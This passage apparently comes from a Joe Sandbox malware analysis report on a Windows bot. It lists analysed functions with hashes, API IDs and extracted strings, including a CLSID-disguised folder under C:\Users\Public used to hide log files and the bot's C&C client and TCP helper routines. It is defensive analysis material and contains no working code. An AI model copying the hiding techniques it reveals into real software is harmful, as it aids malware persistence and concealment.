                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                                                                                                                                  • API String ID: 513531256-2729875187
                                                                                                                                                  • Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                                                                                                                                                  • Instruction ID: 192698b790a3d7501eb2b4f62925a19198bc1222833894718abd5b71bfc7802f
                                                                                                                                                  • Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                                                                                                                                                  • Instruction Fuzzy Hash: 64418F72A0C641A6F7209BDDE8643BAB761BB887C4F484031DB4D83795DF3CE5898740
                                                                                                                                                  Function 00007FF8BFB3A202 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                                                                                                                                  • API String ID: 513531256-1680544107
                                                                                                                                                  • Opcode ID: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                                                                                                                                                  • Instruction ID: 62b23c8210b6e5dcf77844c9e77a2b4ca0a6dae22ac9b611cc26dcf38094468e
                                                                                                                                                  • Opcode Fuzzy Hash: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                                                                                                                                                  • Instruction Fuzzy Hash: E1419E31A8C64286F320EB99E9647BA6364FB857C0F944131EB4D47B96CF3CE685C740
                                                                                                                                                  Function 00007FF8BFB81292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                                                                                                                                  • API String ID: 513531256-3034662401
                                                                                                                                                  • Opcode ID: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                                                                                                                                                  • Instruction ID: 35fe09fd5ab75f8f0947a13e1b2c85f5956fca94ccb25f00d5fd60c10542b033
                                                                                                                                                  • Opcode Fuzzy Hash: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                                                                                                                                                  • Instruction Fuzzy Hash: E0416F21A0D68286F3219B99E8553FA73A1FB897C0F448035DB4D97B96CF3CE985C740
                                                                                                                                                  Function 00007FF8BFB8C780 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  • API String ID: 2918714741-1951032453
                                                                                                                                                  • Opcode ID: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                                                                                                                                                  • Instruction ID: e21125e88ac6f15d7a7162140a449020367fbe9ab2483713d00ba015a0b2b830
                                                                                                                                                  • Opcode Fuzzy Hash: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                                                                                                                                                  • Instruction Fuzzy Hash: 26219266A0964792E7119F99E840BAA7760BB847D4F448032EF4C47BA6DF3CE845C700
                                                                                                                                                  Function 00007FF8BFB8C900 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  • API String ID: 2918714741-719680006
                                                                                                                                                  • Opcode ID: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                                                                                                                                                  • Instruction ID: 81e7acbe6276570ffdadcceb78e253ecb891e58cf5bb9b1173ad15bdb73e6d96
                                                                                                                                                  • Opcode Fuzzy Hash: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                                                                                                                                                  • Instruction Fuzzy Hash: 4B2192A2A0968696E7519FADFC407AA3360FB847D4F848032EF4C47A95DF3DE885C700
                                                                                                                                                  Function 00007FF6BE0330B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                                                  • API String ID: 2887799713-3464183404
                                                                                                                                                  • Opcode ID: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
                                                                                                                                                  • Instruction ID: 0b40197dd596c0941ebe135bedfb6dbff91e011903937a1346c78e12f90e19e5
                                                                                                                                                  • Opcode Fuzzy Hash: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
                                                                                                                                                  • Instruction Fuzzy Hash: FF418561E0CA1781F6304A8E9580B7965607F38BCAF544933FB2FC7690EE6DE661C301
                                                                                                                                                  Function 00007FF6BE032AE5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                                                  • API String ID: 2018770650-4119452840
                                                                                                                                                  • Opcode ID: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
                                                                                                                                                  • Instruction ID: ce1595fe91266c2d9653f22db43a222632bbd20b43f29a7cc1e501b66b710605
                                                                                                                                                  • Opcode Fuzzy Hash: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
                                                                                                                                                  • Instruction Fuzzy Hash: A2311A51F1C20B82FA30AB0DA560BB921659F7C794F144832FB1ECB291ED2CBDB59342
                                                                                                                                                  Function 00007FF8BFB31CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                                                  • Opcode ID: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                                                                                                                                                  • Instruction ID: 6697be577d3731c10e596c78ec9d2979261c823488febe5b65ac3e8ee5428bd4
                                                                                                                                                  • Opcode Fuzzy Hash: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                                                                                                                                                  • Instruction Fuzzy Hash: AA21C055FC851341FA208FADAE806B85355AF06BF0F544331DF3D5BAE5DE2CA9458300
                                                                                                                                                  Function 00007FF8BFB8219D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                                                  • Opcode ID: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                                                                                                                                                  • Instruction ID: d54c172bcc8366aaa6b0cd1f63937d0d8bcf20c985ed33fb8fe988ef89450408
                                                                                                                                                  • Opcode Fuzzy Hash: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                                                                                                                                                  • Instruction Fuzzy Hash: 9F21AE61B1854381EA206FEDB980AF86781AF967F4F549331DF3C87AE6DE2DA545C300
                                                                                                                                                  Function 00007FF8BA4F2154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                                                                                                                                                  • Instruction ID: 97f05a5cd3ac173e1b26da6bb5bf76497277d6dff0dcd1e54510f32f9f13b267
                                                                                                                                                  • Opcode Fuzzy Hash: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                                                                                                                                                  • Instruction Fuzzy Hash: 4E118E71A0C54296E620AB9DAC404666660EF897D4F105276EF6E837B4DF7CD60E8B04
                                                                                                                                                  Function 00007FF8B9152154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                                                                                                                                                  • Instruction ID: 0722d53ca4698f41bb1f32d85a576daa88be57ee0f9b98ea681112667b733d14
                                                                                                                                                  • Opcode Fuzzy Hash: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                                                                                                                                                  • Instruction Fuzzy Hash: FF116071A086C386F7609F1DA840076AA61EF897D4F604232EB6E937E4DF7CE549DB00
                                                                                                                                                  Function 00007FF8B9184CD4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                                                                                                                                                  • Instruction ID: d599f8b02d15c097c4edb2ea157ec6280bd39072c889911d061f5213395272f2
                                                                                                                                                  • Opcode Fuzzy Hash: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                                                                                                                                                  • Instruction Fuzzy Hash: 8E116371A0858296E3209F2DE840565A660AF987D4F104335EB6D83AE5DF7CD507AB01
                                                                                                                                                  Function 00007FF8BFB52294 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                                                                                                                                                  • Instruction ID: 7cf72b812e1feb1f079a4c886e2a667ce9ff092629a9dbf0a4f1cfb7c8caca71
                                                                                                                                                  • Opcode Fuzzy Hash: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                                                                                                                                                  • Instruction Fuzzy Hash: 35118271A0958296F720AB9DE84006AB760FF987D4F504235EB6D83FE4DF7CE5498B00
                                                                                                                                                  Function 00007FF8BFB31344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
